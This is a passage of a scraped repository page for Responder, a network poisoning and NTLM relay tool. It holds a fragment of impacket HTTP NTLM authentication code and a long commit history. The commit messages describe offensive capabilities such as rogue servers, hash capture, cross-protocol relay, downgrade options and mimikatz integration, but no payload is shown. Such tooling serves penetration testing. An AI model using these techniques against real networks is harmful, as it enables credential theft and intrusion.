+            self.__ntlmssp_info = ntlm.AV_PAIRS(challenge['TargetInfoFields'])
+
+        # Format: serverChallenge, reserved, ...
+        return serverChallenge, None
+
+    def get_auth_headers_auto(self, http_obj, method, path, headers):
+        if self.__aesKey != '' or self.__TGT != None or self.__TGS != None:
+            raise Exception('NTLM authentication in HTTP connection used, ' \
+                            'cannot use Kerberos.')
+
+        auth = ntlm.getNTLMSSPType1(domain=self.__domain)
+        serverChallenge = self.send_ntlm_type1(http_obj, method, path, headers, auth.getData())[0]
+
+        if serverChallenge is not None:
+            self.__auth_type = AUTH_NTLM
+
+            type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, serverChallenge, self.__username,
+                                                             self.__password, self.__domain,
+                                                             self.__lmhash, self.__nthash)
+
+            auth_line_http = 'NTLM %s' % base64.b64encode(type3.getData()).decode('ascii')
+        else:
+            if self.__auth_type == AUTH_AUTO and AUTH_BASIC in self.__auth_types:
+                self.__auth_type = AUTH_BASIC
+                return self.get_auth_headers_basic(http_obj, method, path, headers)
+            else:
+                raise Exception('No supported auth offered by URL: %s' % self.__auth_types)
+
+        # Format: auth_headers, reserved, ...
+        return {'Authorization': auth_line_http}, None
--- a/tools/MultiRelay/impacket-dev/impacket/nt_errors.py
+++ b/tools/MultiRelay/impacket-dev/impacket/nt_errors.py
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
lgandx	7bdfe7bbdd	Merge branch 'master' of https://github.com/lgandx/Responder	2021-10-25 22:52:35 -03:00
lgandx	c449b6bcb9	Added DHCP server	2021-10-25 22:51:39 -03:00
lgandx	88ea72908c	Added DHCP server	2021-10-25 22:41:01 -03:00
lgandx	3fe574683b	Merge pull request #163 from Hackndo/master Add ESS downgrade parameter	2021-05-17 21:33:16 -03:00
Pixis	dcb80d992e	Add --lm switch for ESS downgrade	2021-05-16 09:55:32 +02:00
Pixis	51f8ab4368	Add ESS disabling information	2021-05-16 09:54:21 +02:00
pixis	baf80aa4f0	Add ESS downgrade parameter	2021-05-14 11:45:18 +02:00
lgandx	ae1c2be51c	minor fix	2021-05-09 19:02:42 -03:00
lgandx	4231532926	minor fix	2021-05-06 19:56:37 -03:00
lgandx	350058c179	fixed minor isse	2021-04-20 13:09:00 -03:00
lgandx	79dfe8ebd0	Merge branch 'master' of https://github.com/lgandx/Responder	2021-04-19 18:14:13 -03:00
lgandx	85315442bd	Added WinRM rogue server	2021-04-19 18:12:27 -03:00
lgandx	35a02e389b	Update README.md	2021-04-19 12:50:44 -03:00
lgandx	b779d1b494	Update README.md	2021-04-19 12:38:21 -03:00
lgandx	53d66e3816	Update README.md	2021-04-19 12:29:36 -03:00
lgandx	72070a02eb	Merge pull request #155 from HexPandaa/patch-1 Compare values with `==` instead of `is`	2021-04-19 12:14:04 -03:00
lgandx	465f730846	Update README.md	2021-04-19 01:32:38 -03:00
lgandx	0b669c305d	Update README.md Added Synacktiv as major donor.	2021-04-16 22:32:51 -03:00
lgandx	8f74fdaf46	forgot to add packets.py	2021-04-16 21:42:22 -03:00
lgandx	e91e37c974	Added dce-rpc module + enhancements + bug fix.	2021-04-16 21:35:32 -03:00
lgandx	027e6b95c3	removed addiontional RR on SRV answers	2021-04-14 02:39:46 -03:00
lgandx	1271b8e179	Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping	2021-04-12 20:42:36 -03:00
lgandx	d01bbaafae	Update README.md	2021-04-05 20:49:54 -03:00
lgandx	e55eeed3d4	Update README.md	2021-04-05 03:15:39 -03:00
HexPandaa	7d96fa95c4	Compare strings with `==` instead of `is` `==` should be used when comparing values, `is` should be used to compare identities. Modern versions of Python throw a SyntaxWarning.	2021-04-02 17:13:05 +02:00
HexPandaa	51f176633e	Compare values with `==` instead of `is` `==` should be used when comparing values, `is` should be used to compare identities. Modern versions of Python throw a SyntaxWarning.	2021-04-02 17:10:17 +02:00
HexPandaa	3d9147f36c	Compare strings with `==` instead of `is` `==` should be used when comparing values, `is` should be used to compare identities. Modern versions of Python throw a SyntaxWarning.	2021-04-02 17:04:36 +02:00
HexPandaa	f4c11111a7	Compare strings with `==` instead of `is` `==` should be used when comparing values, `is` should be used to compare identities. Modern versions of Python throw a SyntaxWarning.	2021-04-02 17:03:56 +02:00
HexPandaa	c33da69a8b	Use `==` instead of `is` `==` should be used when comparing values, `is` should be used to compare identities.	2021-04-02 17:00:35 +02:00
lgandx	6c51080109	removed FindSMB2UPTime.py since RunFinger already get this info	2021-03-26 01:43:03 -03:00
lgandx	724cfecb5a	minor fix	2021-03-26 00:10:14 -03:00
lgandx	3b3ee1314e	Ported DHCP.py to py3	2021-03-25 23:34:16 -03:00
lgandx	6658c2b98f	made compatible py2/py3	2021-03-25 23:06:48 -03:00
lgandx	5c56c6e0ca	Ported to py3	2021-03-25 21:55:56 -03:00
lgandx	35b12b4832	Removed MultiRelay binaries	2021-03-20 14:25:39 -03:00
lgandx	cc3a5b5cff	added a check for exec file	2021-03-20 10:22:52 -03:00
lgandx	5d762c4a55	Removed BindShell executable file	2021-03-20 10:10:49 -03:00
lgandx	ccee87aa95	Removed donation banner	2021-03-20 09:23:30 -03:00
lgandx	dd1a674080	removed verification	2021-03-20 09:20:32 -03:00
lgandx	4b02bcadf1	google verification	2021-03-20 09:13:42 -03:00
lgandx	8104139a35	Added donation banner.	2021-02-10 13:09:07 -03:00
lgandx	06f9f91f11	added donation address and minor typo	2021-02-10 11:09:15 -03:00
lgandx	b0f044fe4e	added smb filetime support	2021-02-08 22:18:41 -03:00
lgandx	4bddf50b5c	Ported MultiRelay to python3 + enhancements.	2021-02-08 15:11:31 -03:00
lgandx	24e7b7c667	Added support for SMB2 signing	2020-12-31 09:39:15 -03:00
lgandx	a78dfdf3c7	minor bugfix	2020-12-31 08:52:18 -03:00
lgandx	e24792d774	Added SMB2 support for RunFinger and various other checks.	2020-12-31 01:27:43 -03:00
lgandx	fc4ac599d3	Merge branch 'master' of https://github.com/lgandx/Responder	2020-12-31 01:18:16 -03:00
lgandx	d2e5642d58	Added SMB2 support for RunFinger and various other checks.	2020-12-31 01:13:27 -03:00
lgandx	7842e51f12	Merge pull request #138 from ThePirateWhoSmellsOfSunflowers/fix_challenge fix custom challenge in python3	2020-12-30 16:54:20 -03:00
lgandx	36ec5cc0a8	Merge pull request #135 from LabanSkollerDefensify/patch-1 Fix typos in README	2020-12-02 22:31:06 -03:00
lgandx	b7626c7581	Merge pull request #145 from khiemdoan/fix-syntax Fix wrong syntax	2020-12-02 22:29:41 -03:00
Khiem Doan	fb10d20ea3	Fix wrong syntax	2020-11-26 14:19:06 +07:00
ThePirateWhoSmellsOfSunflowers	f581d4dd0e	small fix	2020-10-13 13:08:45 +02:00
ThePirateWhoSmellsOfSunflowers	7b47c8fe4e	fix custom challenge in python3	2020-10-13 11:47:33 +02:00
Laban Sköllermark	12b796a292	Fix typos in README * Missing "is" in description of the tool * s/an unique/a unique/ since it starts with a consonant sound * Move a word to its correct place	2020-09-30 13:17:34 +02:00
lgandx	af7d27ac8c	Fixed LLMNR/NBT-NS/Browser issue when binding to a specific interface	2020-09-28 08:11:41 -03:00
lgandx	b982e6e3ce	Merge pull request #133 from NickstaDB/fix-bind-address Use settings.Config.Bind_To as bind address.	2020-09-08 07:33:05 -03:00
nickyb	f84ad05e9a	Use settings.Config.Bind_To as bind address.	2020-09-07 15:29:41 +01:00
lgandx	42a7e3b75c	version update	2020-08-19 08:06:40 -03:00
lgandx	5e39c91a05	py3 bugfix	2020-08-17 20:28:15 -03:00
lgandx	d6f4911eb4	python3.8 compability fix	2020-08-17 16:08:24 -03:00
lgandx	691c44138c	Merge pull request #125 from nop5L3D/patch-1 Alter "is" to "==" for Python 3.8 compatibility	2020-08-17 14:58:18 -03:00
lgandx	0f3980578a	Merge pull request #121 from Sagar-Jangam/master Added DNSUpdate.py, a small script to add DNS record to DC for gateri…	2020-08-17 14:56:59 -03:00
nop5L3D	052c1a8285	Alter "is" to "==" for Python 3.8 compatibility Change the usage of "is" to "==" to comply with the new syntax warnings found in python >= 3.8 Observed warnings: RunFinger.py:61: SyntaxWarning: "is" with a literal. Did you mean "=="? if PY2OR3 is "PY2": RunFinger.py:68: SyntaxWarning: "is" with a literal. Did you mean "=="? if PY2OR3 is "PY2": RunFinger.py:74: SyntaxWarning: "is" with a literal. Did you mean "=="? if PY2OR3 is "PY2":	2020-06-15 14:29:05 -04:00
Sagar-Jangam	05617defef	Added DNSUpdate.py, a small script to add DNS record to DC for gatering from different VLANs	2020-04-08 07:23:35 -04:00
lgandx	eb449bb061	Merge pull request #117 from sbrun/master Fix encoding issue in Python 3	2020-02-21 11:25:12 -03:00
Sophie Brun	7420f62082	Fix encoding issue in Python 3	2020-02-21 10:02:31 +01:00
lgandx	b510b2bb25	Added py3 and py2 compatibility + many bugfix	2020-01-09 14:47:56 -03:00
lgandx	c52843a535	Added RDP rogue server	2019-08-17 16:31:34 -03:00
lgandx	88e316c9a3	Merge pull request #91 from cnotin/patch-1 FindSMB2UPTime: properly deal with servers not disclosing their boot time	2019-05-26 11:05:49 -03:00
lgandx	e1d1657dff	Merge pull request #92 from Crypt0-M3lon/master Fix socket timeout on HTTP POST requests	2019-05-26 11:04:48 -03:00
Crypt0-M3lon	32be7a1853	Merge pull request #1 from Crypt0-M3lon/Crypt0-M3lon-patch-1 Fix socket timeout on HTTP POST requests	2019-02-08 09:08:49 +01:00
Crypt0-M3lon	e7a787cbc4	Fix socket timeout on HTTP POST requests Remaining size should be checked at the end of the loop, the current implementation hang when POST request Content-Lenght is 0. We want to check for Content-Length header only if we received full header.	2019-02-08 09:08:24 +01:00
Clément Notin	80aa964294	FindSMB2UPTime: properly deal with servers not disclosing their boot time	2019-02-04 11:46:08 +01:00
lgandx	7339411766	Enhanced flags2 to force SMB signature off	2019-01-15 16:18:47 -03:00
lgandx	9656f140e7	Merge pull request #89 from cnotin/patch-1 Replace ParseSMB2NTLMv2Hash() by ParseSMBHash() to handle NTLMv1 and NTLMv2	2019-01-13 11:21:24 -03:00
Clément Notin	c99c9edf19	Replace ParseSMB2NTLMv2Hash() by ParseSMBHash() to handle NTLMv1 and NTLMv2	2019-01-09 19:16:52 +01:00
lgandx	38e721da98	fixed minor bugfix on recent merge	2018-11-28 21:07:39 -03:00
lgandx	fab7ba9e6e	Merge pull request #88 from PaulSec/master Added proper changes to RunFinger	2018-11-28 20:40:51 -03:00
Paul A	105502edd4	Added proper changes to RunFinger (and is not checking for MS17-010 straight away)	2018-11-18 12:41:15 +01:00
lgandx	be551a0db3	Merge pull request #85 from mdeous/multirelay-exclude-user [MultiRelay] allow to blacklist users	2018-11-11 09:51:04 -03:00
lgandx	4b5da9d7ce	Merge pull request #86 from mschader/patch-1 Update README.md: Fix typo	2018-11-11 09:49:23 -03:00
lgandx	47e63ae4ec	removed debug string	2018-11-11 09:46:15 -03:00
Markus	2287f936fd	Update README.md: Fix typo Fixed just a tiny typo.	2018-10-22 15:54:06 +02:00
MatToufoutu	4e70e95a8e	allow to blacklist users	2018-09-14 00:19:17 +02:00
lgandx	a256355468	Merge pull request #46 from jackassplus/patch-1 Create OSX_launcher.sh	2018-08-24 15:16:00 -03:00
lgandx	dd39ee0c3d	Merge pull request #69 from EuanKerr/patch-1 Update RunFinger.py	2018-08-24 15:14:29 -03:00
lgandx	861c797eb5	Merge pull request #80 from myst404/master Better handling of cleartext credentials	2018-08-24 15:13:39 -03:00
lgandx	6916b085ec	Merge pull request #83 from cnotin/patch-2 Fix multi HTTP responses	2018-08-24 14:34:53 -03:00
lgandx	6037d98160	Merge pull request #82 from cnotin/patch-1 Fix version number in settings.py	2018-08-24 14:34:15 -03:00
Clément Notin	defabfa543	Fix multi HTTP responses	2018-08-17 15:45:13 +02:00
Clément Notin	621c5a3c12	Fix version number in settings.py	2018-08-17 11:51:18 +02:00
myst404	750a2466d9	Better handling of cleartext credentials	2018-06-18 10:59:52 +02:00
lgandx	242bc37997	Merge pull request #71 from myst404/master FindSMB2UPTime.py : Subnet support, error handling, minor improvements	2018-05-28 20:02:44 -03:00
lgandx	fe53785eec	Merge pull request #72 from chrismaddalena/master Fixed some small typos in MS17-010 output	2018-05-28 20:01:44 -03:00
Chris Maddalena	daaf6f7296	Fixed some small typos in MS17-010 output	2017-12-05 17:31:27 -05:00
myst404	97aeac26d8	Subnet support, error handling, minor improvements	2017-11-30 16:05:14 +01:00
Euan	064f7e62c7	Update RunFinger.py	2017-11-20 12:38:54 +00:00
lgandx	c6bc263b5e	Merge pull request #51 from watersalesman/master Fixed instances of "CRTL-C" to "CTRL-C"	2017-11-20 07:35:33 -03:00
lgandx	46cd888d15	Merge pull request #63 from myst404/master Fixed space typo in FindSMB2UPTime.py	2017-11-20 07:32:49 -03:00
lgandx	a5a328b8c9	Merge pull request #67 from lprat/master Add ignore case on check body for html inject	2017-11-20 07:31:52 -03:00
lgandx	b37f56264a	Added: check for null sessions and MS17-010	2017-11-19 22:58:28 -03:00
Lionel PRAT	47c311553e	Add ignore case on check body for html inject	2017-11-16 16:31:18 +01:00
lgandx	207b0d455c	added support for plain auth	2017-09-06 02:07:41 -03:00
lgandx	679cf65cff	Changed the complete LDAP parsing hash algo (ntlmv2 bug).	2017-09-04 23:15:27 -03:00
lgandx	be26b504b5	Fixed various bugs and improved the LDAP module.	2017-09-04 21:57:51 -03:00
lgandx	75aa21bbb9	Several Bugfix	2017-09-04 18:50:04 -03:00
myst404	11c00969c3	Fixed space typo in FindSMB2UPTime.py	2017-08-28 18:37:34 +02:00
lgandx	ffca0e2a92	Merge pull request #61 from OJ/fix-ldap-hash-parsing Pass Challenge value to the LDAP parsing function	2017-08-24 22:00:10 -03:00
OJ	33bde41902	Pass Challenge value to the LDAP parsing function	2017-08-25 09:03:01 +10:00
lgandx	95c0d6e673	Merge pull request #58 from megabug/mssql-browser Add Microsoft SQL Server Browser responder	2017-07-15 13:23:08 -03:00
lgandx	0436b47a2c	Merge pull request #59 from breakersall/patch-2 Add in check for uptime since March 14th 2017, which could indicate t…	2017-07-15 13:19:53 -03:00
Matt Kelly	5859c31e8e	Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 (EternalBlue/dismay style exploit)	2017-06-28 14:09:05 -05:00
Matthew Daley	bc90f8fe27	Update README.md with new SQL Browser port usage	2017-06-28 19:15:07 +12:00
Matthew Daley	bff935e71e	Add Microsoft SQL Server Browser responder When connecting to a named instance, a SQL client (at least SQL Server Native Client) will send a request (namely a CLNT_UCAST_INST message) to the server's SQL Server Browser service for instance connection information. If it gets no response, the connection attempt fails. By adding a SQL Server Browser responder for these requests, we ensure that connections are successfully made to the SQL Server responder for hash capture. As per the comment, this is based on the document "[MC-SQLR]: SQL Server Resolution Protocol", currently available at <https://msdn.microsoft.com/en-us/library/cc219703.aspx>.	2017-06-28 19:14:38 +12:00
Randy Ramos	44a4e495cc	Fixed instances of "CRTL-C" to "CTRL-C"	2017-04-22 14:40:19 -04:00
lgandx	38219e249e	added: mimi32 cmd, MultiRelay random RPC & Namedpipe & latest mimikatz	2017-03-30 23:39:41 -03:00
lgandx	2223ef6689	updated readme	2017-03-29 14:24:17 -03:00
lgandx	2a80c7ed9c	MultiRelay 2.0 Release	2017-03-29 13:28:31 -03:00
jackassplus	54389c4851	Create OSX_launcher.sh Launcher helper for OSX. Checks for running LaunchDaemons using one of responder's ports and unloads them one by one, placing them on a stack to be restarted when responder is killed.	2017-03-27 08:10:33 -07:00
lgandx	b05bdcab96	Removed Paypal donation link.	2017-03-15 19:15:46 -03:00
lgandx	6f3cc4564c	Fixed bug in FindSMB2UPTime	2017-03-08 00:01:38 +01:00
lgandx	2b322b227e	minor fix	2017-02-18 20:57:36 +01:00
lgandx	9440cb3e30	Merge branch 'master' of https://github.com/lgandx/Responder	2017-02-18 20:40:01 +01:00
lgandx	21d48be98f	Added: Hashdump, Stats report	2017-02-18 20:38:40 +01:00
lgandx	c9609bd8c6	Merge pull request #25 from joshuaskorich/master added `ip` commands in addition to ifconfig and netstat	2017-02-10 22:03:46 +01:00
lgandx	0642999741	fixed crash: typo.	2017-02-10 18:18:23 +01:00
lgandx	5f59f2934e	Merge pull request #33 from skelsec/master Fixing HTTP header issue	2017-02-09 22:40:28 +01:00
skelsec	225857b6ed	cleaning up comments	2017-02-06 10:48:23 -08:00
skelsec	2c32704b85	SimpleSSL	2017-02-06 09:42:35 -08:00
skelsec	0e3e6f9745	making HTTP great again	2017-02-06 09:21:44 -08:00
lgandx	0ede767d95	Merge pull request #32 from Gifts/fix_randchallenge Fix for RandomChallenge function.	2017-02-01 22:32:13 +01:00
Gifts	de6e869a79	Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string	2017-02-01 16:55:15 +03:00
lgandx	cf654ee178	Merge pull request #28 from kithack/master Fix Proxy_Auth. Random challenge broke it.	2017-01-19 22:31:52 +01:00
Timon Hackenjos	5a2ee18bfa	Fix Proxy_Auth. Random challenge broke it.	2017-01-19 17:46:21 +01:00
thejosko	db61f243c9	added `ip` commands in addition to ifconfig and netstat	2017-01-11 17:35:08 -06:00
lgandx	0d441d1899	Added: Random challenge for each requests (default)	2017-01-03 17:40:38 -03:00
lgandx	1d38cd39af	Added: Random challenge for each requests (default)	2017-01-03 17:35:49 -03:00
lgandx	17dc81cb68	Added paypal button	2016-12-21 11:53:33 -03:00
lgandx	ab2d8907f0	Added: Scripting support. -c and -d command line switch	2016-11-18 11:55:16 -03:00
lgandx	730808c83c	Added: BTC donation address	2016-11-12 12:28:13 -03:00
lgandx	b455ff406f	re-fixed Typo	2016-11-10 14:28:16 -03:00
lgandx	aff17ca9d3	MultiRelay now executes WMIC commands instead of bat files	2016-11-10 14:24:54 -03:00
lgandx	62d7dc4080	Merge pull request #18 from trustedsec/patch-1 Update RelayMultiCore.py	2016-11-10 10:57:18 -03:00
trustedsec	cad3adc319	Update RelayMultiCore.py Minor typo fixes, nothing major.	2016-11-10 14:13:13 +01:00
lgandx	fc2aadca6e	Minor fix	2016-11-09 14:12:37 -03:00
lgandx	90071187cd	Merge pull request #17 from leonjza/master Check if the platform is macOS before setting TCP_KEEPIDLE	2016-11-02 11:18:10 -03:00
Leon Jacobs	bcac8c4166	Check if the platform is macOS before trying to set a non-exported TCP_KEEPIDLE option	2016-11-02 09:25:37 +02:00
lgandx	4a7499df03	Removed ThreadingMixIn. MultiRelay should process one request at the timeand queue the next ones.	2016-10-20 23:43:34 -03:00
lgandx	581d7e6849	Merge pull request #14 from nvssks/master Patch for Android 4.x terminals that are missing some linux commands	2016-10-20 01:03:10 -03:00
Nikos Vassakis	f321c1bbcc	Patch for Android 4.x terminals that are missing some linux commands	2016-10-19 18:24:12 +01:00
lgandx	027f841cdf	Fixed wrong challenge issue	2016-10-18 11:53:09 -03:00
lgandx	4b7e6397cc	Now grabs and print time on remote machine.	2016-10-15 14:54:05 -03:00
lgandx	d5601056b3	Added: Logs dumped files for multiple targets	2016-10-15 11:48:36 -03:00
lgandx	6bcd6c44cd	updated to current version.	2016-10-12 13:46:16 -03:00
lgandx	6af72d27c4	MultiRelay initial commit	2016-10-12 13:33:49 -03:00
lgandx	10d33eba72	Minor fix	2016-10-12 13:26:45 -03:00
lgandx	3e46ecd27e	Changed to executable	2016-10-12 13:25:39 -03:00
lgandx	176d04b6c5	Removing old Relay scripts	2016-10-12 13:20:37 -03:00
lgandx	57c7e3c691	Removing old Relay scripts	2016-10-12 13:18:49 -03:00
lgandx	5b0617361e	Added: Compability for Multi-Relay	2016-10-12 13:16:11 -03:00
lgandx	f6e560b7fd	initial commit	2016-10-12 13:09:55 -03:00
lgandx	9c91658fe8	Minor fix	2016-10-12 01:04:11 -03:00
lgandx	60c91c6626	Fix values for win98 and win10 (requested here: `d9d34f04cd`)	2016-10-12 00:49:34 -03:00
lgandx	72603dc482	Minor fix	2016-10-12 00:27:54 -03:00
lgandx	ce211f7fcf	Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6 )	2016-10-12 00:24:31 -03:00
lgandx	0cf1087010	fixed bug in hash parsing.	2016-10-09 22:20:06 -03:00
lgandx	0713c0350f	updated version number	2016-10-06 17:35:55 -03:00
lgandx	c6e401c229	Added: Now delete services on the fly.	2016-10-06 17:28:27 -03:00
lgandx	a814d0de81	Updated versions	2016-10-05 12:04:17 -03:00
lgandx	d81ef9c33a	Added: Possibility to target all users. use 'ALL' with -u	2016-10-05 11:59:00 -03:00
lgandx	7054c60f38	Fixed minor bug	2016-10-04 23:09:26 -03:00
lgandx	196eded194	Minor fixes	2016-10-04 21:28:24 -03:00
lgandx	3d3a19f66b	Using Trans pipes instead of read/writes & fixed low priv bug which drops you in a shell while the user has no rights	2016-10-04 21:19:08 -03:00
lgandx	48936d8953	updated version number	2016-10-02 23:47:10 -03:00
lgandx	cd09e19a93	Added logs folder.	2016-10-02 23:41:00 -03:00
lgandx	5d83778ac7	Removed logs folder.	2016-10-02 23:39:25 -03:00
lgandx	ab67070a2b	Added: Cross-protocol NTLMv1-2 relay (beta).	2016-10-02 23:34:47 -03:00
lgandx	5f1fa4a00f	Minor fix	2016-09-21 13:37:46 -03:00
lgandx	bfe57d28ac	updated version	2016-09-12 00:03:06 -03:00
lgandx	2cdeef3c83	minor bug fix	2016-09-12 00:01:27 -03:00
lgandx	92c9191bda	Config dumped independently. Responder-Session.log is now a clean file.	2016-09-11 23:03:50 -03:00
lgandx	35d933d596	Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On.	2016-09-11 22:33:00 -03:00
lgandx	fb69f14f69	Reflected recent changes.	2016-09-11 21:59:50 -03:00
lgandx	3e2e375987	removed debug info	2016-09-11 21:55:37 -03:00
lgandx	ad9ce6e659	Added support for webdav, auto credz.	2016-09-11 21:51:57 -03:00
lgandx	04c270f6b7	Added option -e, specify an external IP address to redirect poisoned traffic to.	2016-09-11 20:25:10 -03:00
lgandx	29ad8a0816	Firefox blacklisted on WPAD since it doesn't honors fail-over proxies. Added SO_LINGER to send RST when close() is called.	2016-09-11 13:07:44 -03:00